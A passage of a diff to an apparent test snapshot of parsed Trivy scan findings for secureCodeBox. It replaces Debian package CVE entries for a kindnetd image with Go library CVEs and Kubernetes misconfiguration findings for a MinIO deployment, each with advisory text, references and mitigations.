"https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", - "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", - ], - }, - "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9893", - "installedVersion": "2.3.3-4", - "packageName": "libseccomp2", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", - "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", - "https://access.redhat.com/errata/RHSA-2019:3624", - "https://access.redhat.com/security/cve/CVE-2019-9893", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", - "https://github.com/seccomp/libseccomp/issues/139", - "https://linux.oracle.com/cve/CVE-2019-9893.html", - "https://linux.oracle.com/errata/ELSA-2019-3624.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", - "https://seclists.org/oss-sec/2019/q1/179", - "https://security.gentoo.org/glsa/201904-18", - "https://ubuntu.com/security/notices/USN-4001-1", - "https://ubuntu.com/security/notices/USN-4001-2", - "https://usn.ubuntu.com/4001-1/", - "https://usn.ubuntu.com/4001-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-9893", - "https://www.openwall.com/lists/oss-security/2019/03/15/1", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "libseccomp: incorrect generation of syscall filters in libseccomp", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9893", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2019:3624", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9893", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://github.com/seccomp/libseccomp/issues/139", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2019/q1/179", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201904-18", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-1", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4001-1/", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4001-2/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -140418,5036 +141544,5484 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "2.8-1", - "packageName": "libsepol1", + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", ], }, - "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", + ], + }, + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + 